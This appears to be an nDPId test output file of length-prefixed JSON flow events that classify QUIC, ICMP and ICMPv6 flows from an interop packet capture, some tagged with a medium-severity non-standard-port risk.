-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434606,"flow_last_seen":1603816444569,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434519,"flow_last_seen":1603816434551,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434743,"flow_last_seen":1603816444721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} -00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434721,"flow_last_seen":1603816444586,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} 
-00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434756,"flow_last_seen":1603816444721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434670,"flow_last_seen":1603816435086,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00854{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816435054,"flow_last_seen":1603816435054,"flow_idle_time":140000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816435020,"flow_last_seen":1603816435194,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00861{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434685,"flow_last_seen":1603816434779,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": 
{"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434784,"flow_last_seen":1603816434822,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434661,"flow_last_seen":1603816434997,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} -00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434602,"flow_last_seen":1603816434650,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434585,"flow_last_seen":1603816434765,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434518,"flow_last_seen":1603816434566,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00859{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434535,"flow_last_seen":1603816444528,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434725,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434764,"flow_last_seen":1603816434897,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434772,"flow_last_seen":1603816434831,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434680,"flow_last_seen":1603816434845,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434670,"flow_last_seen":1603816444524,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434528,"flow_last_seen":1603816434679,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00864{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434595,"flow_last_seen":1603816435011,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816434609,"flow_last_seen":1603816434806,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1668,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
-00855{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434569,"flow_last_seen":1603816434601,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434806,"flow_last_seen":1603816435089,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 